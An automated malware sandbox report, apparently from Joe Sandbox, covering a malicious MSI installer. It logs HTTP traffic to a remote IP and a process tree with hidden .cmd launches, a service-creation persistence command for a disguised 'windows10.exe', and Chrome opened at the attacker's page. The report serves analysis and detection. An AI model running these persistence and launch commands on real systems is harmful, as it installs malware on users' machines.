                                                                    Jul 4, 2024 09:13:17.167999983 CEST454OUTGET /clientes/inspecionando.php HTTP/1.1
                                                                    Host: 45.90.123.184
                                                                    Connection: keep-alive
                                                                    Upgrade-Insecure-Requests: 1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Jul 4, 2024 09:13:17.631432056 CEST203INHTTP/1.1 200 OK
                                                                    Date: Thu, 04 Jul 2024 07:13:17 GMT
                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                    Content-Length: 0
                                                                    Keep-Alive: timeout=5, max=100
                                                                    Connection: Keep-Alive
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Jul 4, 2024 09:13:17.750442982 CEST396OUTGET /favicon.ico HTTP/1.1
                                                                    Host: 45.90.123.184
                                                                    Connection: keep-alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                    Referer: http://45.90.123.184/clientes/inspecionando.php
                                                                    Accept-Encoding: gzip, deflate
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Jul 4, 2024 09:13:17.945689917 CEST491INHTTP/1.1 404 Not Found
                                                                    Date: Thu, 04 Jul 2024 07:13:17 GMT
                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                    Content-Length: 275
                                                                    Keep-Alive: timeout=5, max=99
                                                                    Connection: Keep-Alive
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 34 35 2e 39 30 2e 31 32 33 2e 31 38 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 45.90.123.184 Port 80</address></body></html>
                                                                    Jul 4, 2024 09:13:18.235829115 CEST538OUTGET /clientes/inspecionando.php HTTP/1.1
                                                                    Host: 45.90.123.184
                                                                    Connection: keep-alive
                                                                    Cache-Control: max-age=0
                                                                    Upgrade-Insecure-Requests: 1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Referer: http://45.90.123.184/clientes/inspecionando.php
                                                                    Accept-Encoding: gzip, deflate
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Jul 4, 2024 09:13:18.457103968 CEST202INHTTP/1.1 200 OK
                                                                    Date: Thu, 04 Jul 2024 07:13:18 GMT
                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                    Content-Length: 0
                                                                    Keep-Alive: timeout=5, max=98
                                                                    Connection: Keep-Alive
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.74970345.90.123.184808024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jul 4, 2024 09:14:01.945453882 CEST6OUTData Raw: 00
                                                                    Data Ascii:


                                                                    HTTPS Proxied Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.7497132.19.104.72443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-07-04 07:13:23 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept: */*
                                                                    Accept-Encoding: identity
                                                                    User-Agent: Microsoft BITS/7.8
                                                                    Host: fs.microsoft.com
                                                                    2024-07-04 07:13:23 UTC466INHTTP/1.1 200 OK
                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                    Content-Type: application/octet-stream
                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                    Server: ECAcc (lpl/EF06)
                                                                    X-CID: 11
                                                                    X-Ms-ApiVersion: Distribute 1.2
                                                                    X-Ms-Region: prod-neu-z1
                                                                    Cache-Control: public, max-age=32215
                                                                    Date: Thu, 04 Jul 2024 07:13:23 GMT
                                                                    Connection: close
                                                                    X-CID: 2


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.7497142.19.104.72443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-07-04 07:13:26 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept: */*
                                                                    Accept-Encoding: identity
                                                                    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                    Range: bytes=0-2147483646
                                                                    User-Agent: Microsoft BITS/7.8
                                                                    Host: fs.microsoft.com
                                                                    2024-07-04 07:13:26 UTC534INHTTP/1.1 200 OK
                                                                    Content-Type: application/octet-stream
                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                    ApiVersion: Distribute 1.1
                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                    X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                    Cache-Control: public, max-age=32265
                                                                    Date: Thu, 04 Jul 2024 07:13:26 GMT
                                                                    Content-Length: 55
                                                                    Connection: close
                                                                    X-CID: 2
                                                                    2024-07-04 07:13:26 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                    Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.74971540.68.123.157443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-07-04 07:13:37 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FsnEL8SGae9S84c&MD=S8EAWlWO HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept: */*
                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                    Host: slscr.update.microsoft.com
                                                                    2024-07-04 07:13:37 UTC560INHTTP/1.1 200 OK
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    Content-Type: application/octet-stream
                                                                    Expires: -1
                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                    ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                    MS-CorrelationId: 8cae2b6d-4306-46d3-aae8-084158bf22a6
                                                                    MS-RequestId: 8d3288cd-6672-4a22-bfb1-204492aa6ce3
                                                                    MS-CV: H6aC0g5r8Ey4UDIu.0
                                                                    X-Microsoft-SLSClientCache: 2880
                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                    X-Content-Type-Options: nosniff
                                                                    Date: Thu, 04 Jul 2024 07:13:37 GMT
                                                                    Connection: close
                                                                    Content-Length: 24490
                                                                    2024-07-04 07:13:37 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                    Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                    2024-07-04 07:13:37 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                    Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.74972052.165.165.26443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-07-04 07:14:20 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FsnEL8SGae9S84c&MD=S8EAWlWO HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept: */*
                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                    Host: slscr.update.microsoft.com
                                                                    2024-07-04 07:14:20 UTC560INHTTP/1.1 200 OK
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    Content-Type: application/octet-stream
                                                                    Expires: -1
                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                    ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                    MS-CorrelationId: ac0318f9-bd85-4646-a043-762d0ac6b350
                                                                    MS-RequestId: 97f5f3c7-05df-46a3-8d69-7e31efd9709f
                                                                    MS-CV: D8d4PqxUBkqQyUAl.0
                                                                    X-Microsoft-SLSClientCache: 1440
                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                    X-Content-Type-Options: nosniff
                                                                    Date: Thu, 04 Jul 2024 07:14:19 GMT
                                                                    Connection: close
                                                                    Content-Length: 30005
                                                                    2024-07-04 07:14:20 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                    Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                    2024-07-04 07:14:20 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                    Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:03:13:07
                                                                    Start date:04/07/2024
                                                                    Path:C:\Windows\System32\msiexec.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\hBqTrQLya4.msi"
                                                                    Imagebase:0x7ff7dbab0000
                                                                    File size:69'632 bytes
                                                                    MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:2
                                                                    Start time:03:13:07
                                                                    Start date:04/07/2024
                                                                    Path:C:\Windows\System32\msiexec.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\msiexec.exe /V
                                                                    Imagebase:0x7ff7dbab0000
                                                                    File size:69'632 bytes
                                                                    MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:4
                                                                    Start time:03:13:09
                                                                    Start date:04/07/2024
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 6BAD67B4EB347E35097C3D98448E2079
                                                                    Imagebase:0x280000
                                                                    File size:59'904 bytes
                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:12
                                                                    Start time:03:13:11
                                                                    Start date:04/07/2024
                                                                    Path:C:\Windows\Installer\MSIDD62.tmp
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\Installer\MSIDD62.tmp" /DontWait /HideWindow "C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\
                                                                    Imagebase:0x3e0000
                                                                    File size:423'936 bytes
                                                                    MD5 hash:768B35409005592DE2333371C6253BC8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 0%, ReversingLabs
                                                                    • Detection: 0%, Virustotal, Browse
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:13
                                                                    Start time:03:13:11
                                                                    Start date:04/07/2024
                                                                    Path:C:\Windows\Installer\MSIDD92.tmp
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\Installer\MSIDD92.tmp" /DontWait /HideWindow "C:\Users\user\Pictures\fotosdaviagem\cont.cmd" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                                                                    Imagebase:0xd70000
                                                                    File size:423'936 bytes
                                                                    MD5 hash:768B35409005592DE2333371C6253BC8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 0%, ReversingLabs
                                                                    • Detection: 0%, Virustotal, Browse
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:14
                                                                    Start time:03:13:11
                                                                    Start date:04/07/2024
                                                                    Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe"
                                                                    Imagebase:0x400000
                                                                    File size:1'626'280 bytes
                                                                    MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000E.00000002.2500868091.00000000008F1000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 3%, ReversingLabs
                                                                    • Detection: 5%, Virustotal, Browse
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:15
                                                                    Start time:03:13:12
                                                                    Start date:04/07/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\"
                                                                    Imagebase:0x7ff74af90000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:16
                                                                    Start time:03:13:12
                                                                    Start date:04/07/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:17
                                                                    Start time:03:13:12
                                                                    Start date:04/07/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Pictures\fotosdaviagem\cont.cmd" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\"
                                                                    Imagebase:0x7ff74af90000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:18
                                                                    Start time:03:13:12
                                                                    Start date:04/07/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:19
                                                                    Start time:03:13:12
                                                                    Start date:04/07/2024
                                                                    Path:C:\Windows\System32\sc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto
                                                                    Imagebase:0x7ff779e30000
                                                                    File size:72'192 bytes
                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:20
                                                                    Start time:03:13:12
                                                                    Start date:04/07/2024
                                                                    Path:C:\Windows\System32\sc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:sc start MeuServico
                                                                    Imagebase:0x7ff779e30000
                                                                    File size:72'192 bytes
                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:22
                                                                    Start time:03:13:14
                                                                    Start date:04/07/2024
                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://45.90.123.184/clientes/inspecionando.php
                                                                    Imagebase:0x7ff6c4390000
                                                                    File size:3'242'272 bytes
                                                                    MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:25
                                                                    Start time:03:13:14
                                                                    Start date:04/07/2024
                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=2224,i,3053730682193171380,1241186122492042118,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                    Imagebase:0x7ff6c4390000
                                                                    File size:3'242'272 bytes
                                                                    MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:26
                                                                    Start time:03:13:20
                                                                    Start date:04/07/2024
                                                                    Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" /systemstartup
                                                                    Imagebase:0x400000
                                                                    File size:1'626'280 bytes
                                                                    MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000001A.00000002.2500173208.0000000000AD1000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:27
                                                                    Start time:03:13:21
                                                                    Start date:04/07/2024
                                                                    Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" -type:exit-monitor-method:collectupload-session-token
                                                                    Imagebase:0x400000
                                                                    File size:1'626'280 bytes
                                                                    MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000001B.00000002.2499757267.0000000000931000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:28
                                                                    Start time:03:13:21
                                                                    Start date:04/07/2024
                                                                    Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=utility--utility-sub-type=network.mojom.
                                                                    Imagebase:0x400000
                                                                    File size:1'626'280 bytes
                                                                    MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000001C.00000002.2499650796.00000000009A1000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:29
                                                                    Start time:03:13:21
                                                                    Start date:04/07/2024
                                                                    Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=gpu-process--field-trial-handle=4305.474
                                                                    Imagebase:0x400000
                                                                    File size:1'626'280 bytes
                                                                    MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000001D.00000002.2500761297.0000000000951000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:30
                                                                    Start time:03:13:21
                                                                    Start date:04/07/2024
                                                                    Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=renderer--field-trial-handle=4304.754958
                                                                    Imagebase:0x400000
                                                                    File size:1'626'280 bytes
                                                                    MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
